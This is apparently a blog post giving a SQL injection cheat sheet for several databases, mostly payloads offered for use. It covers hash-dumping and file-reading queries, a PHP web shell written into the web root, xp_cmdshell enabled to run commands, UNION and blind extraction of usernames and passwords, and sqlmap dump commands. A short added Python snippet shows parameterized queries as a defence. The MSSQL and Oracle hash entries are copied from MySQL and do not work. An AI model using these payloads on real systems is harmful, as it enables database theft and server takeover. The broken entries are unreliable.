SQL Injection Cheat Sheet

Here is the SQL injection cheat sheet for MySQL, MSSQL, PostgreSQL, and Oracle.

Sep 9, 2021 · By Jobyer Ahmed

Enumeration

Gather the information needed to move to higher privileges.

MySQL

Information: SQL query
Database Version: select @@version
Current Database: select database()
Other database names: select schema_name from information_schema.schemata
Database User: select user()
               select system_user()
Database users and password hashes: select host, user, password from mysql.user
    (on MySQL 5.7 and later the hash column is named authentication_string)
Table names: select table_schema, table_name from information_schema.tables
             select table_name from information_schema.tables where table_schema='userdb'
Column names: select table_name, column_name from information_schema.columns
              select column_name from information_schema.columns where table_name='usertable'
Read system files: select load_file('/etc/hosts')
Write to a file: select "<?php system($_GET['cmd']); ?>",2,3,4 into outfile '/var/www/html/legit.php'

MSSQL

Information: SQL query
Database Version: select @@version;
Current Database: select db_name();
Available database names: select name from master..sysdatabases;
Is the current login a DBA (sysadmin): SELECT is_srvrolemember('sysadmin');
Database users and password hashes: the query listed here, select host, user, password from mysql.user;, is copied from the MySQL table above; mysql.user does not exist on MSSQL
Table names: select table_schema, table_name from information_schema.tables;
             select table_name from information_schema.tables where table_schema='userdb';
Column names: select table_name, column_name from information_schema.columns;
              select column_name from information_schema.columns where table_name='usertable';
XP_CMDSHELL (enable the extended procedure, then run a command):
    sp_configure 'show advanced options', 1; RECONFIGURE; GO
    sp_configure 'xp_cmdshell', 1; RECONFIGURE; GO
    EXEC xp_cmdshell 'ping attacker_ip'
    (GO is a batch separator understood by sqlcmd and SSMS, not a T-SQL statement)

Oracle

Information: SQL query
Database Version: SELECT banner FROM v$version;
                  SELECT version FROM v$instance;
Current Database: SELECT SYS.DATABASE_NAME FROM DUAL;
                  SELECT instance_name FROM V$INSTANCE;
Available schema (owner) names: SELECT DISTINCT owner FROM all_tables;
DBA accounts: SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';
Database users and password hashes: the query listed here, select host, user, password from mysql.user;, is copied from the MySQL table above; mysql.user does not exist on Oracle
Table names: SELECT table_name FROM all_tables;
             SELECT table_name FROM all_tables WHERE owner='web_db';
Column names: SELECT column_name FROM all_tab_columns WHERE table_name = 'users' AND owner='web_db';

Exploitation

Understanding the manual attack matters more than running a tool blindly. Without that understanding you cannot tell why a tool is failing, or do the work by hand when that is required.

MySQL Error Based Manual Example

#Find how many columns the original query returns
id=1 order by 1 #No Error
id=1 order by 2 #No Error
id=1 order by 3 #No Error
id=1 order by 4 #Error, so the query returns 3 columns

#Find which column reflects injected data
id=1 union select null,2,3 #Error
id=1 union select 1,null,3 #No Error

#Get Table name
id=1 union select 1,table_name,3 from information_schema.tables

#Get Columns name from a table
id=1 union select 1,column_name,3 from information_schema.columns where table_name = 'users'

#Get contents from columns
id=1 union select 1,concat(username,0x3a,password),3 FROM users

Boolean-based Blind SQL Injection

#Verify
id=1 AND '1'='1' #Page loads normally
id=1 AND '1'='2' #If the site is vulnerable, the page won't load normally

#Check whether the first table name starts with 'a'. If it does, the page loads normally.
id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = 'a'

#Same check for 'b'; repeat for each character and position to recover the full name.
id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = 'b'
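As an added illustration (not part of the original post), the Python/sqlite3 snippet below shows why the order by and boolean payloads above behave as described: the vulnerable lookup concatenates the id into the SQL text, so a true or false condition changes the result and an out-of-range ORDER BY raises a database error, while the parameterized lookup binds the id as a value and never parses it as SQL. The users table and its rows are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the post's 'users' table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "alice", "5f4dcc3b"), (2, "bob", "e10adc39")])
    return con


def lookup_vulnerable(con, id_param):
    """Concatenates the raw parameter into the SQL text (the pattern the cheat sheet exploits).

    Returns the usernames found, or None when the database raises an error,
    mirroring the '#Error' / '#No Error' observations in the manual examples.
    """
    sql = "SELECT username FROM users WHERE id = " + id_param
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.OperationalError:
        return None


def lookup_parameterized(con, id_param):
    """Validates the parameter as an integer and binds it; its text is never parsed as SQL."""
    try:
        user_id = int(id_param)
    except ValueError:
        return []  # reject anything that is not a plain integer id
    rows = con.execute("SELECT username FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for payload in ("1", "1 AND '1'='1'", "1 AND '1'='2'", "1 ORDER BY 2"):
        print(repr(payload), "vulnerable:", lookup_vulnerable(db, payload),
              "| parameterized:", lookup_parameterized(db, payload))
```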

SQLMAP

Sqlmap is a popular, powerful tool for exploiting SQL injection. It automates detection and exploitation across the common injection techniques and database backends.

#Capture the request with Burp Suite and save it to a file called post.txt, then:
sqlmap -r post.txt --technique E --threads 5 --current-db --dbms=mysql

#Find tables
sqlmap -r post.txt --technique E --threads 5 --dbms=mysql -D database --tables

#Find columns
sqlmap -r post.txt --technique E --threads 5 --dbms=mysql -D database -T users --columns

#Dump contents
sqlmap -r post.txt --technique E --threads 5 --dbms=mysql -D database -T users --sql-query="select username,password from users"

Reference:

https://sqlwiki.netspi.com/attackQueries/informationGathering/

https://portswigger.net/web-security/sql-injection/cheat-sheet